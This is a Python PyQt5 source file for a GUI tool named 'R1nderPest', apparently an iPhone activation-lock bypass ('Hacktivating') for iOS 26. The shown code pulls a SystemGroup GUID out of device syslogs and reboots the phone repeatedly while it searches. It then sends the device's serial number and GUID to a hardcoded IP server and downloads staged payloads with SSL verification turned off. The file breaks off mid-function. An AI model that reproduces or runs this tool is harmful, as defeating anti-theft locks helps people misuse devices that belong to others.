# -*- coding: utf-8 -*-

# Form implementation generated from reading ui file '.\update.ui'
#
# Created by: PyQt5 UI code generator 5.15.5
#
# WARNING: Any manual changes made to this file will be lost when pyuic5 is
# run again.  Do not edit this file unless you know what you are doing.


import ctypes
from PyQt5 import QtCore, QtGui, QtWidgets
from PyQt5.QtWidgets import *
from PyQt5.QtGui import QFontDatabase, QFont
from PyQt5.QtCore import *
import os
import threading
import time
import subprocess
import datetime
from colorama import *
import sys
import re
import shutil
import sqlite3
import atexit
import urllib.parse
import json
import struct
import binascii
from collections import Counter
import getpass
from art import text2art
import requests

base_dir = os.path.dirname(__file__)

ctypes.windll.shcore.SetProcessDpiAwareness(0)

version = 2.1

animation = False
onlyFindGuid = False

print(text2art("R1nderPest"))
print("==> Version 2.1 Release <==")
print("--------------------------------------------------")
print("\n* Developed by ZeroxDev")
base_dir = os.path.dirname(__file__)



class Ui_MainWindow(object):
    def __init__(self):
        self.api_url = "http://46.17.104.62:8001//get2.php"
        self.timeouts = {
            'asset_wait': 300,
            'asset_delete_delay': 15,
            'reboot_wait': 300,
            'syslog_collect': 180
        }
        self.mount_point = os.path.join(os.path.expanduser("~"), f".ifuse_mount_{os.getpid()}")
        self.afc_mode = None
        self.device_info = {}
        self.guid = None
        self.iOS = "26.1"
        self.attempt_count = 0
        self.max_attempts = 15
        self.global_GUID = ""
    def setupUi(self, MainWindow):
        MainWindow.setObjectName("MainWindow")
        MainWindow.resize(1087, 630)
        MainWindow.setMinimumSize(QtCore.QSize(1087, 630))
        MainWindow.setMaximumSize(QtCore.QSize(1087, 630))
        self.centralwidget = QtWidgets.QWidget(MainWindow)
        self.centralwidget.setObjectName("centralwidget")
        self.Intro = QtWidgets.QFrame(self.centralwidget)
        self.Intro.setGeometry(QtCore.QRect(-10, -10, 1101, 641))
        self.Intro.setStyleSheet("background-color: rgb(0, 0, 0);")
        self.Intro.setFrameShape(QtWidgets.QFrame.StyledPanel)
        self.Intro.setFrameShadow(QtWidgets.QFrame.Raised)
        self.Intro.setObjectName("Intro")
        self.label = QtWidgets.QLabel(self.Intro)
        self.label.setGeometry(QtCore.QRect(120, 110, 441, 151))
        self.label.setStyleSheet("background-color: rgba(255, 255, 255, 0);")
        self.label.setText("")
        self.label.setPixmap(QtGui.QPixmap(os.path.join(base_dir, "./img/logo (1).png")))
        self.label.setScaledContents(True)
        self.label.setObjectName("label")
        self.label_2 = QtWidgets.QLabel(self.Intro)
        self.label_2.setGeometry(QtCore.QRect(420, 10, 681, 631))
        self.label_2.setStyleSheet("background-color: rgba(255, 255, 255, 0);")
        self.label_2.setText("")
        self.label_2.setPixmap(QtGui.QPixmap(os.path.join(base_dir, "./img/glow_phone.png")))
        self.label_2.setScaledContents(True)
        self.label_2.setObjectName("label_2")
        self.welcomeTitle = QtWidgets.QLabel(self.Intro)
        self.welcomeTitle.setGeometry(QtCore.QRect(100, 220, 421, 91))
        font = QtGui.QFont()
        font.setFamily("Futura Cyrillic Bold")
        font.setPointSize(26)
        font.setBold(True)
        font.setWeight(75)
        self.welcomeTitle.setFont(font)
        self.welcomeTitle.setStyleSheet("background-color: rgba(255, 255, 255, 0);\n"
"color: rgb(255, 255, 255);")
        self.welcomeTitle.setObjectName("welcomeTitle")
        self.welcomeMessage = QtWidgets.QLabel(self.Intro)
        self.welcomeMessage.setGeometry(QtCore.QRect(100, 290, 431, 111))
        font = QtGui.QFont()
        font.setFamily("Futura Cyrillic Bold")
        font.setPointSize(16)
        font.setBold(True)
        font.setWeight(75)
        self.welcomeMessage.setFont(font)
        self.welcomeMessage.setStyleSheet("background-color: rgba(255, 255, 255, 0);\n"
"color: rgb(255, 255, 255);")
        self.welcomeMessage.setWordWrap(True)
        self.welcomeMessage.setObjectName("welcomeMessage")
        self.introStatusLabel = QtWidgets.QLabel(self.Intro)
        self.introStatusLabel.setGeometry(QtCore.QRect(100, 430, 441, 21))
        font = QtGui.QFont()
        font.setFamily("Futura Cyrillic Bold")
        font.setPointSize(14)
        font.setBold(True)
        font.setWeight(75)
        self.introStatusLabel.setFont(font)
        self.introStatusLabel.setStyleSheet("background-color: rgba(255, 255, 255, 0);\n"
"color: rgb(255, 255, 255);")
        self.introStatusLabel.setAlignment(QtCore.Qt.AlignCenter)
        self.introStatusLabel.setObjectName("introStatusLabel")
        self.frame = QtWidgets.QFrame(self.Intro)
        self.frame.setGeometry(QtCore.QRect(170, 470, 311, 21))
        self.frame.setStyleSheet("background-color: rgb(47, 47, 47);\n"
"border-radius: 10px;")
        self.frame.setFrameShape(QtWidgets.QFrame.StyledPanel)
        self.frame.setFrameShadow(QtWidgets.QFrame.Raised)
        self.frame.setObjectName("frame")
        self.pb1 = QtWidgets.QFrame(self.frame)
        self.pb1.setGeometry(QtCore.QRect(0, 0, 31, 21))
        self.pb1.setStyleSheet("background-color: rgb(255, 255, 255);\n"
"border-radius: 10px;")
        self.pb1.setFrameShape(QtWidgets.QFrame.StyledPanel)
        self.pb1.setFrameShadow(QtWidgets.QFrame.Raised)
        self.pb1.setObjectName("pb1")
        self.label_5 = QtWidgets.QLabel(self.Intro)
        self.label_5.setGeometry(QtCore.QRect(10, 360, 1101, 281))
        self.label_5.setStyleSheet("background-color: rgba(255, 255, 255, 0);")
        self.label_5.setText("")
        self.label_5.setPixmap(QtGui.QPixmap(os.path.join(base_dir, "./img/bg_GLOW.png")))
        self.label_5.setScaledContents(True)
        self.label_5.setObjectName("label_5")
        self.HomePage = QtWidgets.QFrame(self.centralwidget)
        self.HomePage.setGeometry(QtCore.QRect(-10, -10, 1101, 641))
        self.HomePage.setStyleSheet("background-color: rgb(26, 26, 26);")
        self.HomePage.setFrameShape(QtWidgets.QFrame.StyledPanel)
        self.HomePage.setFrameShadow(QtWidgets.QFrame.Raised)
        self.HomePage.setObjectName("HomePage")
        self.label_3 = QtWidgets.QLabel(self.HomePage)
        self.label_3.setGeometry(QtCore.QRect(770, 10, 411, 131))
        self.label_3.setStyleSheet("background-color: rgba(255, 255, 255, 0);")
        self.label_3.setText("")
        self.label_3.setPixmap(QtGui.QPixmap(os.path.join(base_dir, "./img/logo (1).png")))
        self.label_3.setScaledContents(True)
        self.label_3.setObjectName("label_3")
        self.deviceName = QtWidgets.QLabel(self.HomePage)
        self.deviceName.setGeometry(QtCore.QRect(40, 30, 601, 61))
        font = QtGui.QFont()
        font.setFamily("Futura Cyrillic Bold")
        font.setPointSize(26)
        font.setBold(True)
        font.setWeight(75)
        self.deviceName.setFont(font)
        self.deviceName.setStyleSheet("background-color: rgba(255, 255, 255, 0);\n"
"color: rgb(255, 255, 255);")
        self.deviceName.setObjectName("deviceName")
        self.deviceInfo = QtWidgets.QLabel(self.HomePage)
        self.deviceInfo.setGeometry(QtCore.QRect(40, 70, 601, 61))
        font = QtGui.QFont()
        font.setFamily("Futura Cyrillic Bold")
        font.setPointSize(14)
        font.setBold(True)
        font.setWeight(75)
        self.deviceInfo.setFont(font)
        self.deviceInfo.setStyleSheet("background-color: rgba(255, 255, 255, 0);\n"
"color: rgb(255, 255, 255);")
        self.deviceInfo.setObjectName("deviceInfo")
        self.frame_3 = QtWidgets.QFrame(self.HomePage)
        self.frame_3.setGeometry(QtCore.QRect(40, 130, 291, 481))
        self.frame_3.setStyleSheet("background-color: rgb(18, 18, 18);\n"
"border-radius: 20px;\n"
"border: 0.5px solid rgb(120, 120, 120);")
        self.frame_3.setFrameShape(QtWidgets.QFrame.StyledPanel)
        self.frame_3.setFrameShadow(QtWidgets.QFrame.Raised)
        self.frame_3.setObjectName("frame_3")
        self.label_4 = QtWidgets.QLabel(self.frame_3)
        self.label_4.setGeometry(QtCore.QRect(40, 18, 211, 441))
        self.label_4.setStyleSheet("border-radius: 0px;\n"
"border: 0px solid rgb(120, 120, 120);")
        self.label_4.setText("")
        self.label_4.setPixmap(QtGui.QPixmap(os.path.join(base_dir, "./img/ios26hello.png")))
        self.label_4.setScaledContents(True)
        self.label_4.setObjectName("label_4")
        self.activateButton = QtWidgets.QPushButton(self.HomePage)
        self.activateButton.setGeometry(QtCore.QRect(350, 560, 721, 51))
        font = QtGui.QFont()
        font.setFamily("Futura Cyrillic Bold")
        font.setPointSize(14)
        font.setBold(True)
        font.setWeight(75)
        self.activateButton.setFont(font)
        self.activateButton.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))
        self.activateButton.setStyleSheet("QPushButton {\n"
"    background-color: rgb(255, 255, 255);\n"
"    color: rgb(0, 0, 0);\n"
"    border-radius: 20px;\n"
"}\n"
"\n"
"QPushButton:hover {\n"
"    \n"
"    background-color: rgb(226, 226, 226);\n"
"    color: rgb(0, 0, 0);\n"
"    border-radius: 20px;\n"
"}")
        self.activateButton.setObjectName("activateButton")
        self.pbFrame = QtWidgets.QFrame(self.HomePage)
        self.pbFrame.setGeometry(QtCore.QRect(350, 560, 721, 51))
        self.pbFrame.setStyleSheet("background-color: rgb(18, 18, 18);\n"
"color: rgb(255, 255, 255);\n"
"border-radius: 20px;\n"
"")
        self.pbFrame.setFrameShape(QtWidgets.QFrame.StyledPanel)
        self.pbFrame.setFrameShadow(QtWidgets.QFrame.Raised)
        self.pbFrame.setObjectName("pbFrame")
        self.progressFrame = QtWidgets.QFrame(self.pbFrame)
        self.progressFrame.setGeometry(QtCore.QRect(0, 0, 0, 51))
        self.progressFrame.setStyleSheet("background-color: rgb(255, 255, 255);\n"
"color: rgb(255, 255, 255);\n"
"border-radius: 20px;\n"
"")
        self.progressFrame.setFrameShape(QtWidgets.QFrame.StyledPanel)
        self.progressFrame.setFrameShadow(QtWidgets.QFrame.Raised)
        self.progressFrame.setObjectName("progressFrame")
        self.frame_4 = QtWidgets.QFrame(self.HomePage)
        self.frame_4.setGeometry(QtCore.QRect(530, 490, 371, 51))
        self.frame_4.setStyleSheet("background-color: rgb(18, 18, 18);\n"
"border-radius: 20px;\n"
"border: 0.5px solid rgb(120, 120, 120);")
        self.frame_4.setFrameShape(QtWidgets.QFrame.StyledPanel)
        self.frame_4.setFrameShadow(QtWidgets.QFrame.Raised)
        self.frame_4.setObjectName("frame_4")
        self.deviceUDID = QtWidgets.QLabel(self.frame_4)
        self.deviceUDID.setGeometry(QtCore.QRect(10, 0, 351, 51))
        font = QtGui.QFont()
        font.setFamily("Futura Cyrillic Bold")
        font.setPointSize(11)
        font.setBold(True)
        font.setWeight(75)
        self.deviceUDID.setFont(font)
        self.deviceUDID.setStyleSheet("color: rgb(255, 255, 255);\n"
"background-color: rgba(255, 255, 255, 0);\n"
"border-radius: 0px;\n"
"border: 0px solid rgb(120, 120, 120);")
        self.deviceUDID.setObjectName("deviceUDID")
        self.frame_7 = QtWidgets.QFrame(self.HomePage)
        self.frame_7.setGeometry(QtCore.QRect(350, 490, 171, 51))
        self.frame_7.setStyleSheet("background-color: rgb(18, 18, 18);\n"
"border-radius: 20px;\n"
"border: 0.5px solid rgb(120, 120, 120);")
        self.frame_7.setFrameShape(QtWidgets.QFrame.StyledPanel)
        self.frame_7.setFrameShadow(QtWidgets.QFrame.Raised)
        self.frame_7.setObjectName("frame_7")
        self.activationState = QtWidgets.QLabel(self.frame_7)
        self.activationState.setGeometry(QtCore.QRect(10, 0, 161, 51))
        font = QtGui.QFont()
        font.setFamily("Futura Cyrillic Bold")
        font.setPointSize(12)
        font.setBold(True)
        font.setWeight(75)
        self.activationState.setFont(font)
        self.activationState.setStyleSheet("color: rgb(255, 255, 255);\n"
"background-color: rgba(255, 255, 255, 0);\n"
"border: 0px solid rgb(120, 120, 120);")
        self.activationState.setObjectName("activationState")
        self.frame_8 = QtWidgets.QFrame(self.HomePage)
        self.frame_8.setGeometry(QtCore.QRect(910, 490, 161, 51))
        self.frame_8.setStyleSheet("background-color: rgb(18, 18, 18);\n"
"border-radius: 20px;\n"
"border: 0.5px solid rgb(120, 120, 120);")
        self.frame_8.setFrameShape(QtWidgets.QFrame.StyledPanel)
        self.frame_8.setFrameShadow(QtWidgets.QFrame.Raised)
        self.frame_8.setObjectName("frame_8")
        self.iOSVersion = QtWidgets.QLabel(self.frame_8)
        self.iOSVersion.setGeometry(QtCore.QRect(10, 0, 191, 51))
        font = QtGui.QFont()
        font.setFamily("Futura Cyrillic Bold")
        font.setPointSize(11)
        font.setBold(True)
        font.setWeight(75)
        self.iOSVersion.setFont(font)
        self.iOSVersion.setStyleSheet("color: rgb(255, 255, 255);\n"
"background-color: rgba(255, 255, 255, 0);\n"
"border-radius: 0px;\n"
"border: 0px solid rgb(120, 120, 120);")
        self.iOSVersion.setObjectName("iOSVersion")
        self.frame_2 = QtWidgets.QFrame(self.HomePage)
        self.frame_2.setGeometry(QtCore.QRect(350, 130, 721, 351))
        self.frame_2.setStyleSheet("background-color: rgb(18, 18, 18);\n"
"border-radius: 20px;\n"
"border: 0.5px solid rgb(120, 120, 120);")
        self.frame_2.setFrameShape(QtWidgets.QFrame.StyledPanel)
        self.frame_2.setFrameShadow(QtWidgets.QFrame.Raised)
        self.frame_2.setObjectName("frame_2")
        self.listWidget = QtWidgets.QListWidget(self.frame_2)
        self.listWidget.setGeometry(QtCore.QRect(20, 20, 681, 311))
        font = QtGui.QFont()
        font.setFamily("Futura Cyrillic Bold")
        font.setPointSize(10)
        font.setBold(True)
        font.setWeight(75)
        self.listWidget.setFont(font)
        self.listWidget.setStyleSheet("background-color: rgba(255, 255, 255, 0);\n"
"color: rgb(255, 255, 255);\n"
"border: 0px solid rgb(120, 120, 120);")
        self.listWidget.setAutoScrollMargin(10)
        self.listWidget.setWordWrap(True)
        self.listWidget.setObjectName("listWidget")
        self.label_6 = QtWidgets.QLabel(self.HomePage)
        self.label_6.setGeometry(QtCore.QRect(410, -20, 711, 331))
        self.label_6.setStyleSheet("background-color: rgba(255, 255, 255, 0);\n"
"border-radius: 0px;")
        self.label_6.setText("")
        self.label_6.setPixmap(QtGui.QPixmap(os.path.join(base_dir, "./img/topGLOW.png")))
        self.label_6.setScaledContents(True)
        self.label_6.setObjectName("label_6")
        self.label_3.raise_()
        self.deviceName.raise_()
        self.deviceInfo.raise_()
        self.frame_3.raise_()
        self.pbFrame.raise_()
        self.activateButton.raise_()
        self.frame_4.raise_()
        self.frame_7.raise_()
        self.frame_8.raise_()
        self.frame_2.raise_()
        self.label_6.raise_()
        self.InfoNotification = QtWidgets.QFrame(self.centralwidget)
        self.InfoNotification.setGeometry(QtCore.QRect(-10, -20, 1101, 651))
        self.InfoNotification.setStyleSheet("background-color: rgba(0, 0, 0, 125);")
        self.InfoNotification.setFrameShape(QtWidgets.QFrame.StyledPanel)
        self.InfoNotification.setFrameShadow(QtWidgets.QFrame.Raised)
        self.InfoNotification.setObjectName("InfoNotification")
        self.frame_5 = QtWidgets.QFrame(self.InfoNotification)
        self.frame_5.setGeometry(QtCore.QRect(770, 40, 301, 141))
        self.frame_5.setStyleSheet("background-color: rgb(255, 255, 255);\n"
"border-radius: 20px;")
        self.frame_5.setFrameShape(QtWidgets.QFrame.StyledPanel)
        self.frame_5.setFrameShadow(QtWidgets.QFrame.Raised)
        self.frame_5.setObjectName("frame_5")
        self.messageTitle = QtWidgets.QLabel(self.frame_5)
        self.messageTitle.setGeometry(QtCore.QRect(10, 10, 271, 31))
        font = QtGui.QFont()
        font.setFamily("Futura Cyrillic Bold")
        font.setPointSize(14)
        font.setBold(True)
        font.setWeight(75)
        self.messageTitle.setFont(font)
        self.messageTitle.setStyleSheet("color: rgb(0, 0, 0);\n"
"background-color: rgba(255, 255, 255, 0);")
        self.messageTitle.setObjectName("messageTitle")
        self.messageContent = QtWidgets.QLabel(self.frame_5)
        self.messageContent.setGeometry(QtCore.QRect(10, 40, 271, 81))
        font = QtGui.QFont()
        font.setFamily("Futura Cyrillic Bold")
        font.setPointSize(10)
        font.setBold(True)
        font.setWeight(75)
        self.messageContent.setFont(font)
        self.messageContent.setStyleSheet("color: rgb(0, 0, 0);\n"
"background-color: rgba(255, 255, 255, 0);")
        self.messageContent.setAlignment(QtCore.Qt.AlignLeading|QtCore.Qt.AlignLeft|QtCore.Qt.AlignTop)
        self.messageContent.setWordWrap(True)
        self.messageContent.setObjectName("messageContent")
        self.closePopup = QtWidgets.QPushButton(self.InfoNotification)
        self.closePopup.setGeometry(QtCore.QRect(930, 140, 131, 31))
        font = QtGui.QFont()
        font.setFamily("Futura Cyrillic Bold")
        font.setPointSize(11)
        font.setBold(True)
        font.setWeight(75)
        self.closePopup.setFont(font)
        self.closePopup.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))
        self.closePopup.setStyleSheet("background-color: rgb(226, 226, 226);\n"
"border-radius: 15px;\n"
"color: rgb(0, 0, 0);")
        self.closePopup.setObjectName("closePopup")
        self.LoadingNotification = QtWidgets.QFrame(self.centralwidget)
        self.LoadingNotification.setGeometry(QtCore.QRect(-10, -20, 1101, 651))
        self.LoadingNotification.setStyleSheet("background-color: rgba(0, 0, 0, 125);")
        self.LoadingNotification.setFrameShape(QtWidgets.QFrame.StyledPanel)
        self.LoadingNotification.setFrameShadow(QtWidgets.QFrame.Raised)
        self.LoadingNotification.setObjectName("LoadingNotification")
        self.frame_6 = QtWidgets.QFrame(self.LoadingNotification)
        self.frame_6.setGeometry(QtCore.QRect(770, 40, 301, 71))
        self.frame_6.setStyleSheet("background-color: rgb(255, 255, 255);\n"
"border-radius: 20px;")
        self.frame_6.setFrameShape(QtWidgets.QFrame.StyledPanel)
        self.frame_6.setFrameShadow(QtWidgets.QFrame.Raised)
        self.frame_6.setObjectName("frame_6")
        self.loadingText = QtWidgets.QLabel(self.frame_6)
        self.loadingText.setGeometry(QtCore.QRect(10, 10, 271, 51))
        font = QtGui.QFont()
        font.setFamily("Futura Cyrillic Bold")
        font.setPointSize(14)
        font.setBold(True)
        font.setWeight(75)
        self.loadingText.setFont(font)
        self.loadingText.setStyleSheet("color: rgb(0, 0, 0);\n"
"background-color: rgba(255, 255, 255, 0);")
        self.loadingText.setAlignment(QtCore.Qt.AlignLeading|QtCore.Qt.AlignLeft|QtCore.Qt.AlignTop)
        self.loadingText.setObjectName("loadingText")
        self.HomePage.raise_()
        self.InfoNotification.raise_()
        self.LoadingNotification.raise_()
        self.Intro.raise_()
        MainWindow.setCentralWidget(self.centralwidget)

        searchThread = threading.Thread(target=self.SearchingForDevices)
        searchThread.start()

        self.InfoNotification.hide()
        self.LoadingNotification.hide()

        global animation

        animation = True

        self.MoveBarThread()

        self.activateButton.clicked.connect(self.StartHacktivating)

        self.closePopup.clicked.connect(self.ClosePopup)

        self.retranslateUi(MainWindow)
        QtCore.QMetaObject.connectSlotsByName(MainWindow)

    ## Bypass Code

    def _run_cmd(self, cmd, timeout=None):
        try:
            res = subprocess.run(cmd, capture_output=True, text=True, timeout=timeout)
            return res.returncode, res.stdout.strip(), res.stderr.strip()
        except subprocess.TimeoutExpired:
            return 124, "", "Timeout"
        except Exception as e:
            return 1, "", str(e)


    def _curl_download(self, url, output_file):
        """Download with SSL verification disabled"""
        curl_cmd = [
            "curl", "-L", 
            "-k",  # ← КЛЮЧЕВОЕ: отключает проверку SSL
            "-f",  # Fail on HTTP errors
            "--connect-timeout", "30",
            "--max-time", "120",
            "-o", output_file,
            url
        ]
        

        code, out, err = self._run_cmd(curl_cmd)
        
        if code != 0:

            return False
            
        if os.path.exists(output_file) and os.path.getsize(output_file) > 0:

            return True
        else:

            return False

    def reboot_device(self):
        """Reboots device and waits for readiness"""


        # Try using pymobiledevice3 for reboot
        code, _, err = self._run_cmd([f"C:/R1nderPest/dependencies/pymobiledevice3.exe", "restart"])
        if code != 0:
            # Fallback to C:/R1nderPest/libimobiledevice/idevicediagnostics.exe
            code, _, err = self._run_cmd(["C:/R1nderPest/libimobiledevice/idevicediagnostics.exe", "restart"])
            if code != 0:
                input()
                return True
        

        
        # Wait for device reboot
        for i in range(60):  # 60 attempts × 5 seconds = 5 minutes
            time.sleep(5)
            code, _, _ = self._run_cmd(["C:/R1nderPest/libimobiledevice/ideviceinfo.exe"])
            if code == 0:
                self.listWidget.addItem("[*] Device reconnected!")
                # Give device extra time for full boot
                time.sleep(10)
                return True
            
            if i % 6 == 0:  # Every 30 seconds
                print("[*] Waiting...")
        

        return False

    def verify_dependencies(self):
        if shutil.which("ifuse"):
            self.afc_mode = "ifuse"
        else:
            self.afc_mode = f"C:/R1nderPest/dependencies/pymobiledevice3.exe"

    def mount_afc(self):
        if self.afc_mode != "ifuse":
            return True
        os.makedirs(self.mount_point, exist_ok=True)
        code, out, _ = self._run_cmd(["mount"])
        if self.mount_point in out:
            return True
        for i in range(5):
            code, _, _ = self._run_cmd(["ifuse", self.mount_point])
            if code == 0:
                return True
            time.sleep(2)
        return False

    def unmount_afc(self):
        if self.afc_mode == "ifuse" and os.path.exists(self.mount_point):
            self._run_cmd(["umount", self.mount_point])
            try:
                os.rmdir(self.mount_point)
            except OSError:
                pass

    def _cleanup(self):
        """Ensure cleanup on exit"""
        self.unmount_afc()

    def detect_device(self):

        code, out, err = self._run_cmd(["C:/R1nderPest/libimobiledevice/ideviceinfo.exe"])
        if code != 0:
            self.listWidget.addItem("[*] Device not found!")
            sys.exit(1)
        
        info = {}
        for line in out.splitlines():
            if ": " in line:
                key, val = line.split(": ", 1)
                info[key.strip()] = val.strip()
        self.device_info = info
        
        
        if info.get('ActivationState') == 'Activated':
            self.listWidget.addItem("[*] Device is already activated!")

    def get_guid_manual(self):
        """Manual GUID input with validation"""

        
        UUID_PATTERN = re.compile(r'^[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}$', re.IGNORECASE)
        
        while True:
            guid_input = input(f"\n{Style.BLUE}➤ Enter SystemGroup GUID:{Style.RESET} ").strip()
            if UUID_PATTERN.match(guid_input):
                return guid_input.upper()
            
    def parse_tracev3_structure(self, data):
        """Parses tracev3 file structure for more precise search"""
        signatures = []
        
        # Search for database-related strings
        db_patterns = [
            b'BLDatabaseManager',
            b'BLDatabase',
            b'BLDatabaseManager.sqlite', 
            b'bookassetd [Database]: Store is at file:///private/var/containers/Shared/SystemGroup',
        ]
        
        for pattern in db_patterns:
            pos = 0
            while True:
                pos = data.find(pattern, pos)
                if pos == -1:
                    break
                signatures.append(('string', pattern, pos))
                pos += len(pattern)
        
        return signatures

    def extract_guid_candidates(self, data, context_pos, window_size=512):
        """Extracts GUIDs with contextual analysis"""
        candidates = []
        
        # Extended GUID pattern
        guid_pattern = re.compile(
            rb'([0-9A-F]{8}[-][0-9A-F]{4}[-][0-9A-F]{4}[-][0-9A-F]{4}[-][0-9A-F]{12})',
            re.IGNORECASE
        )
        
        # Search in context window
        start = max(0, context_pos - window_size)
        end = min(len(data), context_pos + window_size)
        context_data = data[start:end]
        
        # GUID search
        for match in guid_pattern.finditer(context_data):
            guid = match.group(1).decode('ascii').upper()
            relative_pos = match.start() + start - context_pos
            
            # Extended GUID validation
            if self.validate_guid_structure(guid):
                candidates.append({
                    'guid': guid,
                    'position': relative_pos,
                    'context': self.get_context_string(context_data, match.start(), match.end())
                })
        
        return candidates

    def validate_guid_structure(self, guid):
        """Extended GUID structure validation"""
        try:
            # Check GUID version (RFC 4122)
            parts = guid.split('-')
            if len(parts) != 5:
                return False
            
            # Check part lengths
            if len(parts[0]) != 8 or len(parts[1]) != 4 or len(parts[2]) != 4 or len(parts[3]) != 4 or len(parts[4]) != 12:
                return False
            
            # Check hex characters
            hex_chars = set('0123456789ABCDEF')
            clean_guid = guid.replace('-', '')
            if not all(c in hex_chars for c in clean_guid):
                return False
            
            # Check version (4th character of 3rd group should be 4)
            version_char = parts[2][0]
            if version_char not in '4':
                return False  # iOS commonly uses version 4
            
            # Check variant (8,9,A,B - 2 high bits)
            variant_char = parts[3][0]
            if variant_char not in '89AB':
                return False
            
            return True
            
        except Exception:
            return False

    def get_context_string(self, data, start, end, context_size=50):
        """Gets context string around GUID"""
        context_start = max(0, start - context_size)
        context_end = min(len(data), end + context_size)
        
        context = data[context_start:context_end]
        try:
            # Try to decode as text
            return context.decode('utf-8', errors='replace')
        except:
            # For binary data show hex
            return binascii.hexlify(context).decode('ascii')

    def analyze_guid_confidence(self, guid_candidates):
        """Analyzes confidence in found GUIDs"""
        if not guid_candidates:
            return None
        
        # Group by GUID
        guid_counts = Counter(candidate['guid'] for candidate in guid_candidates)
        
        # Calculate score for each GUID
        scored_guids = []
        for guid, count in guid_counts.items():
            score = count * 10  # Base score by occurrence count
            
            # Additional confidence factors
            positions = [c['position'] for c in guid_candidates if c['guid'] == guid]
            
            # Preference for GUIDs close to BLDatabaseManager
            close_positions = [p for p in positions if abs(p) < 100]
            if close_positions:
                score += len(close_positions) * 5
            
            # Preference for GUIDs before BLDatabaseManager (more common in logs)
            before_positions = [p for p in positions if p < 0]
            if before_positions:
                score += len(before_positions) * 3
            
            scored_guids.append((guid, score, count))
        
        # Sort by score
        scored_guids.sort(key=lambda x: x[1], reverse=True)
        return scored_guids

    def confirm_guid_manual(self, guid):

        
        response = "y"

        self.global_GUID = guid

        return response 

    def get_guid_enhanced(self):
        """Enhanced GUID extraction version"""
        self.attempt_count += 1
        self.listWidget.addItem(f"[*] GUID search attempt {self.attempt_count}/{self.max_attempts}")
        
        udid = self.deviceUDID.text().replace("UDID: ", "")
        log_path = f"{udid}.logarchive"
        
        try:
            QtWidgets.QApplication.processEvents()
            # Collect logs
            self.listWidget.addItem("[*] Collecting device logs...")
            code, _, err = self._run_cmd([f"C:/R1nderPest/dependencies/pymobiledevice3.exe", "syslog", "collect", log_path], timeout=120)
            if code != 0:
                self.listWidget.addItem("[*] Log collection failed!")
                return None
            
            trace_file = os.path.join(log_path, "logdata.LiveData.tracev3")
            if not os.path.exists(trace_file):
                self.listWidget.addItem("[*] tracev3 file not found!")
                return None
            
            # Read and analyze file
            with open(trace_file, 'rb') as f:
                data = f.read()
            
            size_mb = len(data) / (1024 * 1024)

            
            # Search for key structures
            signatures = self.parse_tracev3_structure(data)

            
            # Collect GUID candidates
            all_candidates = []
            bl_database_positions = []
            
            for sig_type, pattern, pos in signatures:
                if pattern == b'BLDatabaseManager':
                    bl_database_positions.append(pos)
                    candidates = self.extract_guid_candidates(data, pos)
                    all_candidates.extend(candidates)
                    
                    if candidates:
                        self.listWidget.addItem("[*] GUID Found!")
            
            if not all_candidates:
                return None
            
            # Confidence analysis
            scored_guids = self.analyze_guid_confidence(all_candidates)
            if not scored_guids:
                return None
            
            # Log results

            for guid, score, count in scored_guids[:5]:
                best_guid, best_score, best_count = scored_guids[0]
            
            # Determine confidence level
            if best_score >= 30:
                confidence = "HIGH"
            elif best_score >= 15:
                confidence = "MEDIUM" 
            else:
                confidence = "LOW"
            
            # Additional verification for low confidence
            if confidence in ["LOW", "MEDIUM"]:
                if not self.confirm_guid_manual(best_guid):
                    return None
            
            return best_guid
            
        finally:
            # Cleanup
            if os.path.exists(log_path):
                shutil.rmtree(log_path)

    def get_guid_auto_with_retry(self):
        """Auto-detect GUID with reboot retry mechanism"""
        self.attempt_count = 0
        
        while self.attempt_count < self.max_attempts:
            guid = self.get_guid_enhanced()
            
            if guid:
                return guid
            
            # If not last attempt - reboot device
            if self.attempt_count < self.max_attempts:
                self.listWidget.addItem("[*] Rebooting device...")

                if not self.reboot_device():
                    self.listWidget.addItem("[*] Failed to reboot device!")
                
                # After reboot re-detect device
                self.listWidget.addItem("[*] Re-detecting device after reboot...")
                self.detect_device()
                
                # Small pause before next attempt
                time.sleep(5)
            else:
                self.listWidget.addItem("[*] GUID not found!")
        
        return None

    def get_guid_auto(self):
        """Auto-detect GUID using enhanced method with retry"""
        return self.get_guid_auto_with_retry()

    def get_all_urls_from_server(self, prd, guid, sn):
        """Requests all three URLs (stage1, stage2, stage3) from the server"""
        params = f"prd={prd}&guid={guid}&sn={sn}&ver={self.iOS}"
        url = f"{self.api_url}?{params}"
        

        code, out, err = self._run_cmd(["curl", "-s", "-k", url])
        if code != 0:
            return None, None, None

        try:
            data = json.loads(out)
            if data.get('success'):
                stage1_url = data['links']['step1_fixedfile']
                stage2_url = data['links']['step2_bldatabase']
                stage3_url = data['links']['step3_final']
                return stage1_url, stage2_url, stage3_url
            else:
                return None, None, None
        except json.JSONDecodeError:
            return None, None, None

    def preload_stage(self, stage_name, stage_url):
        """Pre-load individual stage with SSL bypass"""
        

        temp_file = f"temp_{stage_name}"
        success = self._curl_download(stage_url, temp_file)
        
        if success:
            if os.path.exists(temp_file):
                os.remove(temp_file)
            return True
        else:
            self.listWidget.addItem("[*] Failed to pre-load!")
            QtWidgets.QApplication.processEvents()
            return False
        
        


    ###############

    def ShowLoadingPopup(self, message: str):
        self.LoadingNotification.show()
        self.loadingText.setText(message)

    def HideLoadingPopup(self):
        self.LoadingNotification.hide()

    def StartHacktivating(self):
        hackThread = threading.Thread(target=self.Hacktivating)
        hackThread.start()

    def Hacktivating(self):

        global onlyFindGuid

        self.activateButton.hide()

        self.pbFrame.show()

        self.listWidget.addItem("[*] Process started!")


        
        QtWidgets.QApplication.processEvents()


        time.sleep(0.4)

        process = subprocess.Popen(
                ['C:/R1nderpest/libimobiledevice/ideviceinfo.exe'],
                stdout=subprocess.PIPE,
                stderr=subprocess.STDOUT,
                stdin=subprocess.PIPE,
                text=True,
                bufsize=1
        )

        output = str(process.stdout.read())


        process.terminate()

        self.setProgress(progress=20)

        

        if "ERROR: No device found!" in output:
            self.listWidget.addItem("[*] Failed to connect to device!")
            QtWidgets.QApplication.processEvents()

            sys.exit()
        elif "ProductType" in output:
            self.listWidget.addItem("[*] Successfully connected to device!")
            self.listWidget.addItem("[*] Starting GUID search... This may take 10-15 attempts!")

            QtWidgets.QApplication.processEvents()
        else:
            self.listWidget.addItem("[*] Failed to connect to device!")
            QtWidgets.QApplication.processEvents()
            
        
        try:
